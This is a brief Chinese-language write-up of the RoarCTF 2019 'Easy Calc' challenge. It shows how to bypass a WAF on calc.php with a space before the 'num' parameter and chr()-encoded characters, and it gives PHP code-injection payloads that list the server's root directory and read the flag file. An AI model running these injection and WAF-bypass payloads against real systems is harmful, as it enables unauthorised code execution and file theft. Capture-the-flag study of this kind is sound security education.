[RoarCTF 2019]Easy Calc 1
进去后是一个计算器,查看源码,发现了一个路径calc.php
进去calc.php看看,有一串代码
再看看calc.php?num=7*7,是可以计算结果的
但是参数不是数字就不行
WAF的问题:WAF不允许num传入字母,那我们可以在num前加个空格来绕过WAF
这里利用PHP的字符串解析特性来绕过WAF,如
calc.php? num=phpinfo();
参考
扫根目录下的所有文件,也就是scandir("/")
但是/被过滤了,于是用chr(47)绕过
chr()的参考
payload为/calc.php? num=print_r(scandir(chr(47)))
文件在flagg路径下
/calc.php?%20num=print_r(file_get_contents(chr(47).chr(102).chr(49).chr(97).chr(103).chr(103)));